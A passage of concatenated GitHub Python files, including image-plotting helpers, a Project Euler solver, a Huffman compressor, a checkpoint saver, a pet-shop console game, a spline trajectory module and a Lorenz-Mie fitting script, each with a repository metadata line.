plt.subplot(cols, per_row, 1 + id)
plt.grid(False)
if isinstance(k, tuple):
plt.title(k[1])
plt.imshow(k[0], cmap=cmap, interpolation='nearest')
else:
plt.imshow(k, cmap=cmap, interpolation='nearest')
else:
plt.title(title)
plt.grid(False)
plt.imshow(img, cmap=cmap, interpolation='nearest')
plt.tight_layout()
plt.show()
def oned_to_flat(o):
if o.shape[-1] == 1:
o = o.reshape((o.shape[0], o.shape[1]))
return (o/o.max()).astype('float64')
def show_representations(model, X_test, number=5, dim=28, do_reshape=True):
representations = model.predict(X_test[:number ** 2, ...])
def flat_to_shaped(x):
return x.reshape((x.shape[0], dim, dim,1)) if do_reshape else x
_r = tile_raster_images(
X=flat_to_shaped(representations),
img_shape=(dim, dim), tile_shape=(number, number),
tile_spacing=(1, 1), output_pixel_vals=False)
_o = tile_raster_images(
X=flat_to_shaped(X_test),
img_shape=(dim, dim), tile_shape=(number, number),
tile_spacing=(1, 1), output_pixel_vals=False)
print(_r.min())
print(_r.max())
show_image([(oned_to_flat(_o), 'Source'), (oned_to_flat(_r), 'Representations')])
def keras2rgb(t):
return np.swapaxes(np.swapaxes(t, 1, 2), 2, 3)
if __name__ == '__main__':
i = load_demo_image()
print(i.shape)
show_image(i)
| nanopony/keras-convautoencoder | helpers.py | helpers.py | py | 5,359 | python | en | code | 174 | github-code | 90 |
74946847015 | # -*- coding: utf-8 -*-
"""
Problem 142 - Perfect Square Collection
Find the smallest x + y + z with integers x > y > z > 0 such that x + y, x − y,
x + z, x − z, y + z, y − z are all perfect squares.
"""
from math import sqrt
def solution():
limit = 1000
squares = {n*n: n for n in xrange(1, int(sqrt(2)*limit))}
# By using the following equations:
#
# x + y = a²
# x - y = b²
# x + z = c²
# x - z = d²
# y + z = e²
# y - z = f²
#
# and the fact that x > y > z > 0, the following becomes clear:
#
# a² > all the other squares
# a² and b² have the same parity
# b² < c²
# a² - c² = f²
# c² - b² = e²
# b² + f² = d²
#
for a in range(6, limit):
for b in range(a % 2 or 2, a, 2):
for c in range(b+1, a):
fsq = a*a - c*c
if fsq not in squares:
continue
esq = c*c - b*b
if esq not in squares:
continue
dsq = b*b + fsq
if dsq not in squares:
continue
x = (a*a + b*b)/2
y = (a*a - b*b)/2
z = (esq - fsq)/2
if z < 0:
continue
return x + y + z
if __name__ == '__main__':
print(solution())
| yred/euler | python/problem_142.py | problem_142.py | py | 1,452 | python | en | code | 1 | github-code | 90 |
69887413418 | class node(object):
def __init__(self,value = None,left = None,right = None,father = None):
self.value = value
self.left = left
self.right = right
self.father = father
def build_father(left,right):
n = node(value = left.value + right.value,left = left,right = right)
left.father = right.father = n
return n
def encode(n):
if n.father == None:
return b''
if n.father.left == n:
return node.encode(n.father) + b'0'
else:
return node.encode(n.father) + b'1'
class tree(object):
def __init__(self):
#数据初始化
self.node_dict = {}
self.count_dict = {}
self.ec_dict = {}
self.nodes = []
self.inverse_dict = {}
#哈夫曼树构建
def build_tree(self, l):
if len(l) == 1:
return l
sorts = sorted(l,key = lambda x:x.value,reverse = False)
n = node.build_father(sorts[0],sorts[1])
sorts.pop(0)
sorts.pop(0)
sorts.append(n)
return self.build_tree(sorts)
def encode(self, echo):
for x in self.node_dict.keys():
self.ec_dict[x] = node.encode(self.node_dict[x])
if echo == True:
print(x)
print(self.ec_dict[x])
def encodefile(self, inputfile):
print("Starting encode...")
f = open(inputfile,"rb")
bytes_width = 1
i = 0
f.seek(0,2)
count = f.tell() / bytes_width
print(count)
nodes = []
buff = [b''] * int(count)
f.seek(0)
#计算字符频率,并将单个字符构建成单一节点
while i < count:
buff[i] = f.read(bytes_width)
if self.count_dict.get(buff[i], -1) == -1:
self.count_dict[buff[i]] = 0
self.count_dict[buff[i]] = self.count_dict[buff[i]] + 1
i = i + 1
print("Read OK")
print(self.count_dict) #输出权值字典,可注释掉
for x in self.count_dict.keys():
self.node_dict[x] = node(self.count_dict[x])
nodes.append(self.node_dict[x])
f.close()
tree = self.build_tree(nodes)
self.encode(False)
print("Encode OK")
head = sorted(self.count_dict.items(),key = lambda x:x[1] ,reverse = True) #对所有根节点进行排序
bit_width = 1
print("head:",head[0][1])
if head[0][1] > 255:
bit_width = 2
if head[0][1] > 65535:
bit_width = 3
if head[0][1] > 16777215:
bit_width = 4
print("bit_width:",bit_width)
i = 0
raw = 0b1
last = 0
name = inputfile.split('.')
o = open(name[0]+"_.txt" , 'wb')
name = inputfile.split('/')
o.write((name[len(name)-1] + '\n').encode(encoding="utf-8"))#写出原文件名
o.write(int.to_bytes(len(self.ec_dict) ,2 ,byteorder = 'big'))#写出结点数量
o.write(int.to_bytes(bit_width ,1 ,byteorder = 'big'))#写出编码表字节宽度
for x in self.ec_dict.keys():#编码文件头
o.write(x)
o.write(int.to_bytes(self.count_dict[x] ,bit_width ,byteorder = 'big'))
print('head OK')
while i < count:
for x in self.ec_dict[buff[i]]:
raw = raw << 1
if x == 49:
raw = raw | 1
if raw.bit_length() == 9:
raw = raw & (~(1 << 8))
o.write(int.to_bytes(raw ,1 , byteorder = 'big'))
o.flush()
raw = 0b1
tem = int(i /len(buff) * 100)
if tem > last:
# print("encode:", tem ,'%')
last = tem
i = i + 1
if raw.bit_length() > 1:
raw = raw << (8 - (raw.bit_length() - 1))
raw = raw & (~(1 << raw.bit_length() - 1))
o.write(int.to_bytes(raw ,1 , byteorder = 'big'))
o.close()
print("File encode successful.")
def decodefile(self, inputfile):
print("Starting decode...")
count = 0
raw = 0
last = 0
f = open(inputfile ,'rb')
f.seek(0,2)
eof = f.tell()
f.seek(0)
name = inputfile.split('/')
outputfile = inputfile.replace(name[len(name)-1], f.readline().decode(encoding="utf-8"))
o = open(outputfile.replace('\n','') ,'wb')
count = int.from_bytes(f.read(2), byteorder = 'big')
bit_width = int.from_bytes(f.read(1), byteorder = 'big')
i = 0
de_dict = {}
while i < count:
key = f.read(1)
value = int.from_bytes(f.read(bit_width), byteorder = 'big')
de_dict[key] = value
i = i + 1
for x in de_dict.keys():
self.node_dict[x] = node(de_dict[x])
self.nodes.append(self.node_dict[x])
tree = self.build_tree(self.nodes)#重建哈夫曼树
self.encode(False)#建立编码表
for x in self.ec_dict.keys():#反向字典构建
self.inverse_dict[self.ec_dict[x]] = x
i = f.tell()
data = b''
while i < eof:#开始解压数据
raw = int.from_bytes(f.read(1), byteorder = 'big')
# print("raw:",raw)
i = i + 1
j = 8
while j > 0:
if (raw >> (j - 1)) & 1 == 1:
data = data + b'1'
raw = raw & (~(1 << (j - 1)))
else:
data = data + b'0'
raw = raw & (~(1 << (j - 1)))
if self.inverse_dict.get(data, 0) != 0:
o.write(self.inverse_dict[data])
o.flush()
#print("decode",data,":",inverse_dict[data])
data = b''
j = j - 1
tem = int(i / eof * 100)
if tem > last:
# print("decode:", tem,'%')#输出解压进度
last = tem
raw = 0
f.close()
o.close()
print("File decode successful.")
if __name__ == '__main__':
temptree = tree()
temptree.encodefile("lenna1.txt")
temptree.encodefile("lenna5.txt")
temptree.encodefile("lenna10.txt")
temptree.encodefile("lenna20.txt") | iamtonymwt/Image-Processing | JPEGpy/Huffman.py | Huffman.py | py | 6,463 | python | en | code | 0 | github-code | 90 |
71635459816 | import os
import numpy as np
import wandb
import logging
logging.getLogger().setLevel(logging.INFO)
class CheckpointSaver:
def __init__(self, dirpath, decreasing=True, top_n=5):
"""
dirpath: Directory path where to store all model weights
decreasing: If decreasing is `True`, then lower metric is better
top_n: Total number of models to track based on validation metric value
"""
if not os.path.exists(dirpath): os.makedirs(dirpath)
self.dirpath = dirpath
self.top_n = top_n
self.decreasing = decreasing
self.top_model_paths = []
self.best_metric_val = np.Inf if decreasing else -np.Inf
def __call__(self, model, epoch, metric_val):
model_path = os.path.join(self.dirpath, model.__class__.__name__ + f'_epoch{epoch}.pt')
save = metric_val<self.best_metric_val if self.decreasing else metric_val>self.best_metric_val
if save:
logging.info(f"Current metric value better than {metric_val} better than best {self.best_metric_val}, saving model at {model_path}, & logging model weights to W&B.")
self.best_metric_val = metric_val
torch.save(model.state_dict(), model_path)
self.log_artifact(f'model-ckpt-epoch-{epoch}.pt', model_path, metric_val)
self.top_model_paths.append({'path': model_path, 'score': metric_val})
self.top_model_paths = sorted(self.top_model_paths, key=lambda o: o['score'], reverse=not self.decreasing)
if len(self.top_model_paths)>self.top_n:
self.cleanup()
def log_artifact(self, filename, model_path, metric_val):
artifact = wandb.Artifact(filename, type='model', metadata={'Validation score': metric_val})
artifact.add_file(model_path)
wandb.run.log_artifact(artifact)
def cleanup(self):
to_remove = self.top_model_paths[self.top_n:]
logging.info(f"Removing extra models.. {to_remove}")
for o in to_remove:
os.remove(o['path'])
self.top_model_paths = self.top_model_paths[:self.top_n]
checkpoint_saver = CheckpointSaver(dirpath='./model_weights', decreasing=True, top_n=5) | makcfd/exploiting-ml-multimodality | my_utilities/logger.py | logger.py | py | 2,214 | python | en | code | 1 | github-code | 90 |
5231802271 | print("************欢迎来到宠物店**************")
dictionary={}
dictionary["name"] = input("请问你的宠物取一个名字")
value = 0
dictionary["value"] = 0
class animal():
def __init__(self):
typeanimal = int(input("请选择宠物类型:1、狗狗;2、企鹅"))
if typeanimal == 1:
typedog = int(input("请选择狗的品种:1、聪明的拉布拉多犬;2、酷酷的雪纳瑞"))
if typedog == 1:
typedog ="聪明的拉布拉多犬"
dictionary["type"]=typedog
print("恭喜你获得了一只聪明的拉布拉多犬")
elif typedog == 2:
typedog ="酷酷的雪纳瑞"
dictionary["type"] = typedog
print("恭喜你获得了一只酷酷的雪纳瑞")
elif typeanimal == 2:
typepenguin = int(input("请选择企鹅的品种:1、迷你的小企鹅;2、胖胖的大企鹅"))
if typepenguin == 1:
typepenguin ="迷你的小企鹅"
dictionary["type"] = typepenguin
print("恭喜你获得了一只迷你的小企鹅")
elif typepenguin== 2:
typepenguin ="胖胖的大企鹅"
dictionary["type"] = typepenguin
print("恭喜你获得了一只胖胖的大企鹅")
while True:
health = int(input("请输入宠物的健康值0—100之间"))
if 0<=health<=100:
dictionary["health"]= health
break
else:
print("输入错误,请重新输入")
def intimacy(self):
pass
@classmethod
def allshow(cls):
print("宠物名称\t\t\t种类\t\t\t健康值\t\t\t亲密度")
for temp in pet:
print("%s%16s%16s%16s" % (temp["name"], temp["type"], temp["health"], temp["value"]))
class dog(animal):
# def __init__(self):
# super().__init__()
@classmethod
def intimacy(cls):
play=int(input())
if play == 1:
for temp in pet:
if temp["health"]<10:
print("无法执行该操作,否则宠物死亡")
else:
if temp["value"]>=100:
temp["value"] =100
else:
temp["value"]=temp["value"]+5
temp["health"]=temp["health"]+5
elif play == 2:
for temp in pet:
if temp["value"]>=100:
temp["value"] =100
else:
temp["value"]=temp["value"]+5
temp["health"]=temp["health"]-10
class punguin(dog):
def __init__(self):
super().__init__()
A=animal()
pet=[]
pet.append(dictionary)
print("\n")
print("以下是你的宠物")
dog.allshow()
print("\n")
while True:
print("选择下面功能\n与宠物互动请按1\n退出宠物系统请按2")
p = int(input())
if p==1:
for temp in pet:
if "聪明的拉布拉多犬"== temp["type"]or temp["type"]=="酷酷的雪纳瑞":
print("1.与你的狗狗玩接飞盘游戏,健康值-10,亲密度+5\n2.让你的狗狗休息,健康值+5,亲密度+1")
dog.intimacy()
else:
print("1.与你的企鹅竞走比赛,健康值-10,亲密度+5\n2.让你的企鹅休息,健康值+5,亲密度+1")
punguin.intimacy()
print("玩游戏后宠物属性\n")
dog.allshow()
elif p==2:
break
else:
print("输入错误,请重新输入")
| zou9229/InternshipStudy | demo1.py | demo1.py | py | 3,660 | python | en | code | 0 | github-code | 90 |
18110796049 | from collections import deque
def doubly(n):
list = deque()
for i in range(n):
line = input().split()
p = line[0]
while True:
try:
key = line[1]
break
except IndexError:
break
if p == "insert":
list.appendleft(key)
elif p == "deleteFirst":
list.popleft()
elif p == "deleteLast":
list.pop()
else:
while True:
try:
list.remove(key)
break
except ValueError:
break
print(' '.join(list))
if "__main__" == __name__:
n = int(input())
doubly(n)
| Aasthaengg/IBMdataset | Python_codes/p02265/s632640942.py | s632640942.py | py | 728 | python | en | code | 0 | github-code | 90 |
18124708729 | s = int(input())
sec = min = hour = 0
sec = s%60
if s >= 60:
min = int(s/60)
if min >= 60:
hour = int(min/60)
min = min%60
print(str(hour) + ':' + str(min) + ':' + str(sec))
| Aasthaengg/IBMdataset | Python_codes/p02390/s966185220.py | s966185220.py | py | 199 | python | en | code | 0 | github-code | 90 |
16471101084 | from scipy.ndimage import gaussian_filter1d
import numpy as np
import json
import os
import torch
def trans_motion3d(motion3d, local3d=None, unit=128):
# orthonormal projection
motion3d = motion3d * unit
# neck and mid-hip
motion3d[1, :, :] = (motion3d[2, :, :] + motion3d[5, :, :]) / 2
motion3d[8, :, :] = (motion3d[9, :, :] + motion3d[12, :, :]) / 2
if local3d is not None:
motion_proj = local3d[[0, 2], :] @ motion3d # (15, 2, 64)
else:
motion_proj = motion3d[:, [0, 2], :] # (15, 2, 64)
motion_proj[:, 1, :] = - motion_proj[:, 1, :]
motion_proj = trans_motion2d(motion_proj)
return motion_proj
def trans_motion2d(motion2d):
# subtract centers to local coordinates
centers = motion2d[8, :, :]
motion_proj = motion2d - centers
# adding velocity
velocity = np.c_[np.zeros((2, 1)), centers[:, 1:] - centers[:, :-1]].reshape(1, 2, -1)
motion_proj = np.r_[motion_proj[:8], motion_proj[9:], velocity]
return motion_proj
def trans_motion_inv(motion, sx=256, sy=256, velocity=None):
if velocity is None:
velocity = motion[-1].copy()
motion_inv = np.r_[motion[:8], np.zeros((1, 2, motion.shape[-1])), motion[8:-1]]
# restore centre position
centers = np.zeros_like(velocity)
sum = 0
for i in range(motion.shape[-1]):
sum += velocity[:, i]
centers[:, i] = sum
centers += np.array([[sx], [sy]])
return motion_inv + centers.reshape((1, 2, -1))
def normalize_motion(motion, mean_pose, std_pose):
"""
:param motion: (J, 2, T)
:param mean_pose: (J, 2)
:param std_pose: (J, 2)
:return:
"""
return (motion - mean_pose[:, :, np.newaxis]) / std_pose[:, :, np.newaxis]
def normalize_motion_inv(motion, mean_pose, std_pose):
if len(motion.shape) == 2:
motion = motion.reshape(-1, 2, motion.shape[-1])
return motion * std_pose[:, :, np.newaxis] + mean_pose[:, :, np.newaxis]
def preprocess_motion2d(motion, mean_pose, std_pose):
motion_trans = normalize_motion(trans_motion2d(motion), mean_pose, std_pose)
motion_trans = motion_trans.reshape((-1, motion_trans.shape[-1]))
return torch.Tensor(motion_trans).unsqueeze(0)
def postprocess_motion2d(motion, mean_pose, std_pose, sx=256, sy=256):
motion = motion.detach().cpu().numpy()[0].reshape(-1, 2, motion.shape[-1])
motion = trans_motion_inv(normalize_motion_inv(motion, mean_pose, std_pose), sx, sy)
return motion
def get_local3d(motion3d, angles=None):
"""
Get the unit vectors for local rectangular coordinates for given 3D motion
:param motion3d: numpy array. 3D motion from 3D joints positions, shape (nr_joints, 3, nr_frames).
:param angles: tuple of length 3. Rotation angles around each axis.
:return: numpy array. unit vectors for local rectangular coordinates's , shape (3, 3).
"""
# 2 RightArm 5 LeftArm 9 RightUpLeg 12 LeftUpLeg
horizontal = (motion3d[2] - motion3d[5] + motion3d[9] - motion3d[12]) / 2
horizontal = np.mean(horizontal, axis=1)
horizontal = horizontal / np.linalg.norm(horizontal)
local_z = np.array([0, 0, 1])
local_y = np.cross(horizontal, local_z) # bugs!!!, horizontal and local_Z may not be perpendicular
local_y = local_y / np.linalg.norm(local_y)
local_x = np.cross(local_y, local_z)
local = np.stack([local_x, local_y, local_z], axis=0)
if angles is not None:
local = rotate_coordinates(local, angles)
return local
def rotate_coordinates(local3d, angles):
"""
Rotate local rectangular coordinates from given view_angles.
:param local3d: numpy array. Unit vectors for local rectangular coordinates's , shape (3, 3).
:param angles: tuple of length 3. Rotation angles around each axis.
:return:
"""
cx, cy, cz = np.cos(angles)
sx, sy, sz = np.sin(angles)
x = local3d[0]
x_cpm = np.array([
[0, -x[2], x[1]],
[x[2], 0, -x[0]],
[-x[1], x[0], 0]
], dtype='float')
x = x.reshape(-1, 1)
mat33_x = cx * np.eye(3) + sx * x_cpm + (1.0 - cx) * np.matmul(x, x.T)
mat33_z = np.array([
[cz, sz, 0],
[-sz, cz, 0],
[0, 0, 1]
], dtype='float')
local3d = local3d @ mat33_x.T @ mat33_z
return local3d
def rotation_matrix_along_axis(x, angle):
cx = np.cos(angle)
sx = np.sin(angle)
x_cpm = np.array([
[0, -x[2], x[1]],
[x[2], 0, -x[0]],
[-x[1], x[0], 0]
], dtype='float')
x = x.reshape(-1, 1)
mat33_x = cx * np.eye(3) + sx * x_cpm + (1.0 - cx) * np.matmul(x, x.T)
return mat33_x
def openpose2motion(json_dir, scale=1.0, smooth=True, max_frame=None):
json_files = sorted(os.listdir(json_dir))
length = max_frame if max_frame is not None else len(json_files) // 8 * 8
json_files = json_files[:length]
json_files = [os.path.join(json_dir, x) for x in json_files]
motion = []
for path in json_files:
with open(path) as f:
jointDict = json.load(f)
joint = np.array(jointDict['people'][0]['pose_keypoints_2d']).reshape((-1, 3))[:15, :2]
if len(motion) > 0:
joint[np.where(joint == 0)] = motion[-1][np.where(joint == 0)]
motion.append(joint)
for i in range(len(motion) - 1, 0, -1):
motion[i - 1][np.where(motion[i - 1] == 0)] = motion[i][np.where(motion[i - 1] == 0)]
motion = np.stack(motion, axis=2)
if smooth:
motion = gaussian_filter1d(motion, sigma=2, axis=-1)
motion = motion * scale
return motion
def get_foot_vel(batch_motion, foot_idx):
return batch_motion[:, foot_idx, 1:] - batch_motion[:, foot_idx, :-1] + batch_motion[:, -2:, 1:].repeat(1, 2, 1)
| ChrisWu1997/2D-Motion-Retargeting | functional/motion.py | motion.py | py | 5,730 | python | en | code | 406 | github-code | 90 |
17931367669 | s = str(input())
n = 4
for bit in range(1 << (n-1)):
f = s[0]
for i in range(0,(n-1)):
if bit & (1 << i):
f += '+-' + s[i+1]
else:
f += '+' + s[i+1]
#print(f)
ans = sum(map(int,f.split('+')))
if ans == 7:
break
print(f.replace('+-','-')+'=7')
| Aasthaengg/IBMdataset | Python_codes/p03545/s485526884.py | s485526884.py | py | 311 | python | en | code | 0 | github-code | 90 |
73951271976 | from dataclasses import dataclass
import numpy as np
import copy
from scipy import interpolate
from scipy.interpolate import BSpline
from scipy.integrate import quad
from shapely.geometry import Point, LinearRing, GeometryCollection, LineString, MultiPoint, Polygon
import pickle
@dataclass
class Region:
name: str
code: int
vertices: np.ndarray # n * 2
@dataclass
class Bound:
name: str
type: str
vertices: np.ndarray
class Trajectory:
X = 0
Y = 1
Z = 2
YAW = 3
SPEED = 4
CURVATURE = 5
DIST_TO_SF_BWD = 6
DIST_TO_SF_FWD = 7
REGION = 8
LEFT_BOUND_X = 9
LEFT_BOUND_Y = 10
RIGHT_BOUND_X = 11
RIGHT_BOUND_Y = 12
BANK = 13
LON_ACC = 14
LAT_ACC = 15
TIME = 16
IDX = 17
ITERATION_FLAG = 18
def __init__(self, num_point: int, ttl_num: int = 0, origin=None) -> None:
self.ttl_num = ttl_num
self.origin = origin
self.points = np.zeros((num_point, 19), dtype=np.float64)
self.points[:, Trajectory.IDX] = np.arange(0, len(self.points), 1)
self.points[:, Trajectory.ITERATION_FLAG] = -1
def __getitem__(self, key):
return self.points[key]
def __setitem__(self, key, val):
self.points[key] = val
def __len__(self):
return len(self.points)
def __iter__(self):
for pt in self.points:
yield pt
def copy(self):
new_traj = Trajectory(len(self.points))
new_traj.points = self.points.copy()
return new_traj
def inc(self, idx: int):
if idx + 1 == len(self.points):
return 0
else:
return idx + 1
def dec(self, idx: int):
if idx - 1 < 0:
return len(self.points) - 1
else:
return idx - 1
def fill_bounds(self, left_poly, right_poly, max_dist=100.0):
def find_intersect(wp: np.ndarray, poly: LinearRing, norm, max_dist):
yaw_tan, x, y = wp[Trajectory.YAW], wp[Trajectory.X], wp[Trajectory.Y]
traj_pt = Point(x, y)
yaw_norm = yaw_tan + norm
max_norm = (x + max_dist * np.cos(yaw_norm),
y + max_dist * np.sin(yaw_norm))
min_norm = (x + max_dist * np.cos(yaw_norm + np.pi),
y + max_dist * np.sin(yaw_norm + np.pi))
line_norm = LineString((min_norm, max_norm))
some_intersects = line_norm.intersection(poly)
this_some_distance = max_dist
this_some_intersection = None
if type(some_intersects) in (GeometryCollection, MultiPoint):
distances = []
intersections = []
for intersection in list(some_intersects.geoms):
if type(intersection) is Point:
distances.append(
traj_pt.distance(intersection))
intersections.append(intersection)
else:
print(
f"Issue with boundary at index {wp[Trajectory.IDX]}: intersection with {poly.name} is not a Point but {type(intersection)}.")
if len(distances) == 0:
print(
f"Issue with boundary at index {wp[Trajectory.IDX]}: no Point intersection found with Geometry of name {poly.name}.")
else:
min_dist_idx = np.argmin(np.array(distances))
this_some_distance = distances[min_dist_idx]
this_some_intersection = intersections[min_dist_idx]
elif type(some_intersects) is Point:
this_some_distance = traj_pt.distance(
some_intersects)
this_some_intersection = some_intersects
else:
# line_vis = np.array(line_norm.coords)
# poly_vis = np.array(poly.coords)
# fig, ax = plt.subplots()
# ax.set_aspect('equal')
# ax.plot(line_vis[:, 0], line_vis[:, 1])
# ax.plot(poly_vis[:, 0], poly_vis[:, 1])
# fig.show()
# raise Exception("No intersection with boundary found.")
return 0.0, traj_pt
return this_some_distance, this_some_intersection
def calc_left_right_bounds(wp):
_, left_bound = find_intersect(
wp, left_poly, np.pi / 2.0, max_dist)
_, right_bound = find_intersect(
wp, right_poly, -np.pi / 2.0, max_dist)
wp[Trajectory.LEFT_BOUND_X] = left_bound.x
wp[Trajectory.LEFT_BOUND_Y] = left_bound.y
wp[Trajectory.RIGHT_BOUND_X] = right_bound.x
wp[Trajectory.RIGHT_BOUND_Y] = right_bound.y
np.apply_along_axis(calc_left_right_bounds, 1, self.points)
def fill_distance(self):
dists = np.zeros(len(self.points), dtype=np.float64)
for i in range(len(self.points)):
j = i + 1 if i < len(self.points) - 1 else 0
dists[i] = self.distance(self.points[i, :], self.points[j, :])
self.points[0, Trajectory.DIST_TO_SF_BWD] = 0.0
self.points[1:, Trajectory.DIST_TO_SF_BWD] = dists[:-1]
self.points[:, Trajectory.DIST_TO_SF_BWD] = np.cumsum(
self.points[:, Trajectory.DIST_TO_SF_BWD])
track_length = np.sum(dists)
self.points[:, Trajectory.DIST_TO_SF_FWD] = track_length - \
self.points[:, Trajectory.DIST_TO_SF_BWD]
def fill_time(self):
# Check for zero speeds
for pt in self.points:
if pt[Trajectory.SPEED] == 0.0 and pt[Trajectory.LON_ACC == 0.0]:
raise Exception(
"Zero speed and lon_acc encoutered. Cannot fill time.")
self.points[0, Trajectory.TIME] = 0.0
for i in range(len(self.points)):
this, next = i, i + 1
if next == len(self.points):
next = 0
# x = 1/2 * (v_0 + v) * t
x = self.distance(self.points[this], self.points[next])
self.points[next, Trajectory.TIME] = x / (
0.5
* (
self.points[this, Trajectory.SPEED]
+ self.points[next, Trajectory.SPEED]
)
)
# self.points[next, Trajectory.TIME] += self.points[this,
# Trajectory.TIME]
def fill_region(self, regions: list):
polygons = []
for region in regions:
polygons.append((Polygon(region.vertices.tolist()), region.code))
def p_in_p(row: np.ndarray):
p = Point([row[Trajectory.X], row[Trajectory.Y]])
for polygon, code in polygons:
if polygon.contains(p):
row[Trajectory.REGION] = code
return
np.apply_along_axis(p_in_p, 1, self.points)
def distance(self, pt1, pt2):
return np.linalg.norm(pt1[Trajectory.X:Trajectory.Y+1] - pt2[Trajectory.X:Trajectory.Y+1])
def ts(self):
return np.linspace(0.0, 1.0, self.__len__(), endpoint=False)
def save(f, traj):
np.savetxt(f, traj.points, delimiter=',')
def load(f):
arr = np.loadtxt(f, np.float64, delimiter=',')
traj = Trajectory(len(arr))
traj.points = arr
return traj
class BSplineTrajectory:
def __init__(self, coordinates: np.ndarray, s: float, k: int):
assert coordinates.shape[0] >= 3 and coordinates.shape[1] == 2 and len(
coordinates.shape) == 2, "coordinates should be N * 2"
# close the loop
coordinates_close_loop = np.vstack(
[coordinates, coordinates[0, np.newaxis, :]])
tck, u = interpolate.splprep(
[coordinates_close_loop[:, 0], coordinates_close_loop[:, 1]], s=s, per=True, k=k)
self._spl_x = BSpline(tck[0], tck[1][0], tck[2])
self._spl_y = BSpline(tck[0], tck[1][1], tck[2])
self._length = self.__get_section_length(0.0, 1.0)
def __integrate_length(self, t: float):
return np.sqrt(interpolate.splev(t, self._spl_x, der=1) ** 2 + interpolate.splev(t, self._spl_y, der=1) ** 2)
def __get_section_length(self, t_min: float, t_max: float):
length, err = quad(self.__integrate_length, t_min, t_max, limit=1000)
return length
def eval_sectional_length(self, ts):
return self.__get_section_length(ts[0], ts[1])
def eval_dx_sectional_length(self, ts):
def to_integrate(t):
return interpolate.splev(t, self._spl_x, der=2) / np.sqrt(interpolate.splev(t, self._spl_x, der=1) ** 2 + interpolate.splev(t, self._spl_y, der=1) ** 2)
length, err = quad(to_integrate, ts[0], ts[1], limit=200)
return length
def eval_dy_sectional_length(self, ts):
def to_integrate(t):
return interpolate.splev(t, self._spl_y, der=2) / np.sqrt(interpolate.splev(t, self._spl_x, der=1) ** 2 + interpolate.splev(t, self._spl_y, der=1) ** 2)
length, err = quad(to_integrate, ts[0], ts[1], limit=200)
return length
def eval(self, t, der=0):
return interpolate.splev(t, self._spl_x, der=der), interpolate.splev(t, self._spl_y, der=der)
def __get_yaw(self, t):
return np.arctan2(interpolate.splev(t, self._spl_y, der=1), interpolate.splev(t, self._spl_x, der=1))
def __get_turn_radius(self, t):
dx = interpolate.splev(t, self._spl_x, der=1)
dy = interpolate.splev(t, self._spl_y, der=1)
d2x = interpolate.splev(t, self._spl_x, der=2)
d2y = interpolate.splev(t, self._spl_y, der=2)
curvature = np.abs(dx * d2y - dy * d2x) / \
np.sqrt((dx ** 2 + dy ** 2) ** 3)
return 1.0 / (np.abs(curvature))
def get_length(self):
return self._length
def eval_yaw(self, t):
return self.__get_yaw(t)
def sample_along(self, interval: float = None, ts=None) -> Trajectory:
if interval is not None:
total_length = self.get_length()
num_sample = int(total_length // interval)
interval = total_length / num_sample
traj = Trajectory(num_sample)
ts = np.linspace(0.0, 1.0, num_sample, endpoint=False)
else:
traj = Trajectory(len(ts))
traj[:, Trajectory.X] = interpolate.splev(ts, self._spl_x)
traj[:, Trajectory.Y] = interpolate.splev(ts, self._spl_y)
traj[:, Trajectory.YAW] = self.__get_yaw(ts)
traj[:, Trajectory.CURVATURE] = self.__get_turn_radius(ts)
for i in range(len(traj)):
if i == 0:
continue
traj[i, Trajectory.DIST_TO_SF_BWD] = traj[i-1,
Trajectory.DIST_TO_SF_BWD] + self.__get_section_length(ts[i-1], ts[i])
traj[:, Trajectory.DIST_TO_SF_FWD] = self._length - \
traj[:, Trajectory.DIST_TO_SF_BWD]
return traj
def copy(self):
return copy.deepcopy(self)
def set_control_point(self, idx, coord):
self._spl_x.c[idx] = coord[0]
self._spl_y.c[idx] = coord[1]
def get_control_point(self, idx):
return self._spl_x.c[idx], self._spl_y.c[idx]
def save(f, traj):
with open(f, "wb") as output_file:
pickle.dump(traj, output_file)
def load(f):
with open(f, "rb") as input_file:
return pickle.load(input_file)
def save_ttl(ttl_path: str, trajectory: Trajectory):
with open(ttl_path, "w") as f:
header = ",".join(
[
str(trajectory.ttl_num),
str(len(trajectory)),
str(trajectory[0, Trajectory.DIST_TO_SF_FWD]),
]
)
if trajectory.origin is not None:
header += "," + ",".join([str(x) for x in trajectory.origin])
f.write(header)
f.write("\n")
def save_row(row: np.ndarray):
vals = [
str(row[Trajectory.X]),
str(row[Trajectory.Y]),
str(row[Trajectory.Z]),
str(row[Trajectory.YAW]),
str(row[Trajectory.SPEED]),
str(row[Trajectory.CURVATURE]),
str(row[Trajectory.DIST_TO_SF_BWD]),
str(row[Trajectory.DIST_TO_SF_FWD]),
str(int(row[Trajectory.REGION])),
str(row[Trajectory.LEFT_BOUND_X]),
str(row[Trajectory.LEFT_BOUND_Y]),
str(row[Trajectory.RIGHT_BOUND_X]),
str(row[Trajectory.RIGHT_BOUND_Y]),
str(row[Trajectory.BANK]),
str(row[Trajectory.LON_ACC]),
str(row[Trajectory.LAT_ACC]),
str(row[Trajectory.TIME]),
]
f.writelines([','.join(vals) + '\n'])
np.apply_along_axis(save_row, 1, trajectory.points)
def load_ttl(ttl_path: str) -> Trajectory:
with open(ttl_path, "r") as f:
header = f.readline().split(",")
assert len(header) >= 6
data = np.loadtxt(ttl_path, dtype=float, delimiter=",", skiprows=1)
trajectory = Trajectory(len(data), int(header[0]), (float(
header[3]), float(header[4]), float(header[5])))
trajectory.points[:, :data.shape[1]] = data
return trajectory
| HaoruXue/spline-trajectory-optimization | spline_traj_optm/models/trajectory.py | trajectory.py | py | 13,395 | python | en | code | 1 | github-code | 90 |
1301144606 | from CNNLorenzMie.crop_feature import crop_feature
import cv2, json
from matplotlib import pyplot as plt
import numpy as np
from lmfit import report_fit
from time import time
import os
with open('your_MLpreds.json', 'r') as f:
MLpreds = json.load(f)
savedict = []
path = os.getcwd()+'/norm_images'
numimgs = len([f for f in os.listdir(path)if os.path.isfile(os.path.join(path, f))])
savedict = []
#just do one at a time for now
for i in range(numimgs):
filepath = path + '/image' + str(i).zfill(4) + '.png'
localim = cv2.imread(filepath)
localpreds = [x for x in MLpreds if x['framenum']==i]
#reformat for cropping
for pred in localpreds:
print(pred)
localxy = {"conf":1}
x_p = pred['x_p']
y_p = pred['y_p']
ext = pred['shape']
localxy["bbox"] = [x_p, y_p, ext, ext]
features,_,_ = crop_feature(img_list = [localim], xy_preds = [[localxy]])
#instatiates a feature, puts in data, coords, x_p, y_p
if len(features[0]) != 1:
print('Something went wrong')
print(len(features[0]))
feature = features[0][0]
feature.deserialize(pred) #puts in rest of feature info
start = time()
result = feature.optimize(method='amoeba-lm')
